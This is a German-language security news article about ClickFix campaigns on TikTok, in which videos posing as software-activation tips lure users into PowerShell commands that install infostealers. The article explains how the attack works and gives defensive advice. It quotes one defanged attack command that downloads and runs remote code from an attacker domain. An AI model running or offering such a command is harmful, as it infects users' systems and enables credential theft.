Eine aktuelle Angriffswelle zeigt, wie die Social-Media-Plattform TikTok zunehmend zur Verbreitung von Informations-Diebstahl (Infostealer) genutzt wird – und zwar über eine Methode mit dem Namen ClickFix. Eine „ClickFix-Attacke“ lockt Nutzer mit vermeintlichen Soforthilfe-Videos oder Aktivierungstipps in die Ausführung gefährlicher Skripte. Laut einer Analyse von Bleeping Computer vom 19. Oktober 2025 erfolgt diese Kampagne exakt über TikTok-Videos, die Nutzer zur Ausführung von PowerShell-Befehlen animieren.
Wie funktioniert eine ClickFix-Infostealer-Attacke über TikTok?
In der konkreten Kampagne zeigen TikTok-Videos vermeintliche Aktivierungstipps für beliebte Software wie Windows, Microsoft 365, Adobe Photoshop, CapCut Pro oder Spotify Premium. Nutzer werden aufgefordert, ein Kommando in der PowerShell einzugeben – zum Beispiel iex (irm slmgr[.]win/photoshop). Hinter dieser scheinbar harmlosen Hilfe verbirgt sich jedoch das Herunterladen und Ausführen von Malware.
Nach der Ausführung wird über den Befehl ein Skript geladen, das eine erste ausführbare Datei herunterlädt – häufig eine Variante von Aura Stealer – gefolgt von einem zweiten Skript, das für dauerhafte Systemzugriffe sorgt. So erhält der Angreifer Kontrolle über den Rechner, ohne dass der Nutzer es sofort bemerkt.
Warum gelingt der Angriff über TikTok so gut?
Drei Faktoren machen diese Angriffe besonders tückisch. Erstens: Das Video-Format vermittelt Authentizität – viele Nutzer glauben, echte Hilfe zu bekommen. Zweitens: Die Videos wirken meist maschinell erstellt, oft mit KI-Stimmen und minimalen Variationen, was massenhafte Verbreitung ermöglicht. Drittens: Der Angriff erfolgt nicht durch Schadcode auf TikTok selbst, sondern durch soziale Manipulation („Social Engineering“) – Nutzer führen den Code freiwillig aus. Dadurch greifen klassische Sicherheitsfilter kaum.
Besonders gefährlich ist, dass diese Videos häufig auch auf anderen Plattformen wie YouTube Shorts oder Instagram Reels gespiegelt werden. Das erschwert die Nachverfolgung und ermöglicht Cyberkriminellen, ihre Inhalte trotz Löschungen schnell neu zu verbreiten.
Welche Folgen ergeben sich aus einer erfolgreichen Infektion?
Wird ein System kompromittiert, kann eine Infostealer-Malware wie Vidar oder StealC eine Vielzahl sensibler Daten abgreifen: Browser-Passwörter, Cookies, Kryptowährungs-Wallets, Screenshots und Authentifizierungs-Daten. Auch gespeicherte Passwörter aus Anwendungen wie Discord, Telegram oder Steam sind betroffen. Die entwendeten Informationen werden anschließend auf Marktplätzen im Darknet weiterverkauft oder für gezielte Angriffe genutzt.
Im Fall der aktuellen TikTok-Kampagne wird die Schadsoftware so ausgeführt, dass sie sofort mit Administratorrechten startet. Dadurch kann sie unbemerkt Änderungen am System vornehmen, Prozesse nachladen oder weitere Schadprogramme installieren.
Wie schützt man sich konkret vor solchen TikTok-ClickFix-Angriffen?
Es gibt mehrere effektive Schutzmaßnahmen. Keinen Code aus sozialen Medien ungeprüft ausführen. Wenn ein Video auffordert, PowerShell zu öffnen und Befehle einzugeben, sollte man sofort misstrauisch werden. Selbst scheinbar harmlose Befehle können Skripte nachladen, die das System kompromittieren.
Software sollte ausschließlich über offizielle Anbieter oder Stores heruntergeladen werden. „Gratis-Aktivierungen“ oder „Free-Cracks“ sind ein häufiger Köder für Schadsoftware. Zwei-Faktor-Authentifizierung (2FA) bietet zusätzlichen Schutz, falls Passwörter bereits kompromittiert wurden. Außerdem sollten Passwörter regelmäßig geändert und Sicherheits-Tools aktuell gehalten werden.
Unternehmen sollten Mitarbeitende im Umgang mit Social-Media-Inhalten schulen. Social Engineering bleibt einer der häufigsten Einfallspunkte für Angriffe. Sicherheitslösungen können verdächtige Aktivitäten – etwa ungewöhnliche PowerShell-Befehle oder Einträge im Autostart – erkennen und blockieren, bevor größerer Schaden entsteht.
Ausblick: Bedeutung und Handlungsempfehlung
Die Nutzung von TikTok als Verbreitungsweg für ClickFix-Infostealer zeigt, wie flexibel Cyberkriminelle auf Trends reagieren. Social-Media-Plattformen werden zunehmend zum Einfallstor für Schadsoftware, weil sie Vertrauen schaffen und Millionen von Menschen täglich erreichen. Die ClickFix-Technik selbst ist nicht neu – sie wurde bereits 2024 beobachtet –, doch TikTok als Träger dieser Angriffe verleiht ihr eine neue Reichweite.
Für Nutzer bedeutet das: Es reicht nicht, keine verdächtigen Links anzuklicken. Auch scheinbar harmlose Handlungsanweisungen aus Videos können gefährlich sein. Wer aufgefordert wird, Systembefehle auszuführen, sollte stets innehalten und den Rat mit offiziellen Quellen abgleichen. Eine kurze Überprüfung kann verhindern, dass ganze Systeme kompromittiert werden.
Fazit: Videotutorials können hilfreich sein – aber sie sind keine offizielle Fehlerdiagnose. Wer sich auf Social-Media-Clips verlässt, um technische Probleme zu lösen, sollte stets Vorsicht walten lassen. Offizielle Anleitungen von Microsoft, Adobe oder anderen Software-Herstellern sind immer die sichere Wahl.
Quellen
- TikTok videos continue to push infostealers in ClickFix attacks — BleepingComputer (19.10.2025)
- TikTok videos + ClickFix tactic = Malware infection — Help Net Security (23.05.2025)
- Beware: ClickFix Scams on TikTok Hide Dangerous Malware — Techopedia
Über den Autor
Letzte Aktualisierung am 20.10.2025 / Affiliate Links / Bilder von der Amazon Product Advertising API. Alle hier angezeigten Preise und Verfügbarkeiten gelten zum angegebenen Zeitpunkt der Einbindung und können sich jederzeit ändern. Der Preis und die Verfügbarkeit, die zum Kaufzeitpunkt auf Amazon.de angezeigt werden, sind maßgeblich. Als Amazon-Partner verdienen wir an qualifizierten Verkäufen.
